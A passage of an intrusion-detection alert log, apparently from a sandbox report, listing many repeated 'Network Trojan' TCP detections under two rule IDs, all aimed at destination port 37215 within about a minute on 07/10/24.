                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2835222
                  Source Port:56950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.350291
                  SID:2835222
                  Source Port:33062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.345555
                  SID:2829579
                  Source Port:38630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.991473
                  SID:2829579
                  Source Port:53948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2829579
                  Source Port:38376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.918054
                  SID:2829579
                  Source Port:45864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.824141
                  SID:2829579
                  Source Port:35682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415369
                  SID:2829579
                  Source Port:46838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.728876
                  SID:2835222
                  Source Port:45998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.611517
                  SID:2829579
                  Source Port:57054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856706
                  SID:2835222
                  Source Port:41770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.903189
                  SID:2829579
                  Source Port:54768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.631405
                  SID:2835222
                  Source Port:59654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.949781
                  SID:2835222
                  Source Port:51656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.860039
                  SID:2829579
                  Source Port:45568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.131272
                  SID:2835222
                  Source Port:47292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.456990
                  SID:2835222
                  Source Port:57344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.599679
                  SID:2829579
                  Source Port:40220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.013937
                  SID:2835222
                  Source Port:48344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.437789
                  SID:2835222
                  Source Port:35412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.201699
                  SID:2829579
                  Source Port:50080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.714362
                  SID:2829579
                  Source Port:55050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.017676
                  SID:2829579
                  Source Port:36778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.381713
                  SID:2829579
                  Source Port:40038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.436089
                  SID:2835222
                  Source Port:48120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134395
                  SID:2829579
                  Source Port:39610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.947642
                  SID:2835222
                  Source Port:40630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.016890
                  SID:2829579
                  Source Port:53500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.633994
                  SID:2829579
                  Source Port:40536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.816598
                  SID:2835222
                  Source Port:57338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.491653
                  SID:2829579
                  Source Port:35154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.572693
                  SID:2835222
                  Source Port:48024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.920264
                  SID:2829579
                  Source Port:58292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.538076
                  SID:2829579
                  Source Port:41490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.622177
                  SID:2829579
                  Source Port:42898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.754443
                  SID:2835222
                  Source Port:34704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.780111
                  SID:2835222
                  Source Port:54994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.928816
                  SID:2829579
                  Source Port:33514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.768377
                  SID:2829579
                  Source Port:45950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.825249
                  SID:2829579
                  Source Port:49818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.894673
                  SID:2829579
                  Source Port:54570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.830587
                  SID:2829579
                  Source Port:46410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247887
                  SID:2835222
                  Source Port:36382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.658066
                  SID:2829579
                  Source Port:36748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.016890
                  SID:2835222
                  Source Port:49428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.220659
                  SID:2829579
                  Source Port:45544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.839974
                  SID:2829579
                  Source Port:36682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.158777
                  SID:2835222
                  Source Port:55074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.982637
                  SID:2835222
                  Source Port:48194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.373871
                  SID:2829579
                  Source Port:43090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.806576
                  SID:2829579
                  Source Port:41512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.604052
                  SID:2829579
                  Source Port:58510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242772
                  SID:2835222
                  Source Port:48886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131322
                  SID:2829579
                  Source Port:44800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.893689
                  SID:2835222
                  Source Port:53866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.628509
                  SID:2829579
                  Source Port:42546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.530342
                  SID:2835222
                  Source Port:40790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.885713
                  SID:2829579
                  Source Port:58540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.198255
                  SID:2829579
                  Source Port:52446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.615141
                  SID:2835222
                  Source Port:33516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.627693
                  SID:2829579
                  Source Port:39118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.324318
                  SID:2829579
                  Source Port:60718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358828
                  SID:2829579
                  Source Port:47294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.277913
                  SID:2829579
                  Source Port:43312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.566037
                  SID:2835222
                  Source Port:34638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.608580
                  SID:2835222
                  Source Port:56718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872664
                  SID:2835222
                  Source Port:44734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453696
                  SID:2835222
                  Source Port:54980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.985379
                  SID:2835222
                  Source Port:33048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.342192
                  SID:2829579
                  Source Port:44820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.206981
                  SID:2835222
                  Source Port:48874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527286
                  SID:2829579
                  Source Port:41974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.443855
                  SID:2835222
                  Source Port:55698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915892
                  SID:2835222
                  Source Port:59740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.865886
                  SID:2835222
                  Source Port:60368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.021892
                  SID:2829579
                  Source Port:42796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.379672
                  SID:2835222
                  Source Port:46682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.037168
                  SID:2835222
                  Source Port:53192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385824
                  SID:2829579
                  Source Port:59348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392573
                  SID:2829579
                  Source Port:56048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.644230
                  SID:2835222
                  Source Port:50540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.294435
                  SID:2829579
                  Source Port:37502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.756816
                  SID:2829579
                  Source Port:58914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.834790
                  SID:2835222
                  Source Port:41068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.334511
                  SID:2835222
                  Source Port:54298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.278115
                  SID:2835222
                  Source Port:57934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.714271
                  SID:2829579
                  Source Port:39480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.875738
                  SID:2829579
                  Source Port:53708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629470
                  SID:2835222
                  Source Port:37946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985108
                  SID:2835222
                  Source Port:54290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.082324
                  SID:2829579
                  Source Port:45308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.603262
                  SID:2835222
                  Source Port:59916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.522844
                  SID:2835222
                  Source Port:58988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.131677
                  SID:2835222
                  Source Port:44874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.427653
                  SID:2829579
                  Source Port:38070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.834803
                  SID:2829579
                  Source Port:43206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879424
                  SID:2829579
                  Source Port:41604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.315595
                  SID:2829579
                  Source Port:38860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.595600
                  SID:2835222
                  Source Port:39522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.462338
                  SID:2829579
                  Source Port:34702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.558731
                  SID:2835222
                  Source Port:40304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.308170
                  SID:2829579
                  Source Port:39440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.525965
                  SID:2835222
                  Source Port:44256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.096498
                  SID:2829579
                  Source Port:57458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.419943
                  SID:2829579
                  Source Port:44412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.529373
                  SID:2835222
                  Source Port:57164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2835222
                  Source Port:58622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231407
                  SID:2829579
                  Source Port:52040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.754688
                  SID:2835222
                  Source Port:44936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.895746
                  SID:2829579
                  Source Port:36864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.900455
                  SID:2829579
                  Source Port:58030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936738
                  SID:2835222
                  Source Port:39868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137908
                  SID:2835222
                  Source Port:39858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527286
                  SID:2835222
                  Source Port:45200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.647337
                  SID:2829579
                  Source Port:32934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.856754
                  SID:2835222
                  Source Port:55468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.866153
                  SID:2835222
                  Source Port:57346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.836980
                  SID:2829579
                  Source Port:35226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927813
                  SID:2835222
                  Source Port:46602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.501518
                  SID:2835222
                  Source Port:52840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.323465
                  SID:2829579
                  Source Port:44088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.124721
                  SID:2829579
                  Source Port:36592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.795318
                  SID:2835222
                  Source Port:56564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.032840
                  SID:2835222
                  Source Port:39760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.019850
                  SID:2829579
                  Source Port:55750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979400
                  SID:2835222
                  Source Port:57204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.217430
                  SID:2835222
                  Source Port:38116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.766150
                  SID:2829579
                  Source Port:43224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.866031
                  SID:2829579
                  Source Port:38990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.339416
                  SID:2835222
                  Source Port:52726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810848
                  SID:2835222
                  Source Port:47168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.686036
                  SID:2829579
                  Source Port:49966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.165302
                  SID:2829579
                  Source Port:57180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.829597
                  SID:2835222
                  Source Port:37278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.360027
                  SID:2829579
                  Source Port:42168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.835442
                  SID:2835222
                  Source Port:35492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2835222
                  Source Port:48162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.374713
                  SID:2829579
                  Source Port:47644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547644
                  SID:2835222
                  Source Port:36784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.815899
                  SID:2829579
                  Source Port:34810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159132
                  SID:2835222
                  Source Port:41938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.428710
                  SID:2835222
                  Source Port:36272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591282
                  SID:2835222
                  Source Port:35786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.231574
                  SID:2829579
                  Source Port:57582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.063694
                  SID:2835222
                  Source Port:53552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047599
                  SID:2835222
                  Source Port:59232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.343986
                  SID:2829579
                  Source Port:46514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.531286
                  SID:2835222
                  Source Port:51180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.648108
                  SID:2829579
                  Source Port:34860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.704112
                  SID:2829579
                  Source Port:53642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.541811
                  SID:2829579
                  Source Port:39398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.739373
                  SID:2829579
                  Source Port:32846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397659
                  SID:2835222
                  Source Port:37822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.412825
                  SID:2835222
                  Source Port:33614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.939939
                  SID:2835222
                  Source Port:38808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.312291
                  SID:2829579
                  Source Port:45322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.617350
                  SID:2835222
                  Source Port:46012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.615736
                  SID:2835222
                  Source Port:57900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.872806
                  SID:2835222
                  Source Port:46442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019424
                  SID:2829579
                  Source Port:39174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.768053
                  SID:2829579
                  Source Port:47164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.601174
                  SID:2835222
                  Source Port:50856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.929759
                  SID:2829579
                  Source Port:53214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.914587
                  SID:2835222
                  Source Port:52646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838932
                  SID:2829579
                  Source Port:48850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.446107
                  SID:2835222
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.662908
                  SID:2835222
                  Source Port:45838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.580773
                  SID:2835222
                  Source Port:56024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.665893
                  SID:2829579
                  Source Port:46004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.759956
                  SID:2829579
                  Source Port:53560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.618161
                  SID:2835222
                  Source Port:54880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.677114
                  SID:2835222
                  Source Port:57598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.482034
                  SID:2835222
                  Source Port:39176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.118074
                  SID:2829579
                  Source Port:39488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.856924
                  SID:2835222
                  Source Port:34050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.590695
                  SID:2835222
                  Source Port:47518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.493700
                  SID:2835222
                  Source Port:57216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.555542
                  SID:2835222
                  Source Port:38052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448352
                  SID:2829579
                  Source Port:42242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875328
                  SID:2835222
                  Source Port:56278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.868751
                  SID:2829579
                  Source Port:40772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.769630
                  SID:2829579
                  Source Port:53526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.455347
                  SID:2829579
                  Source Port:54344
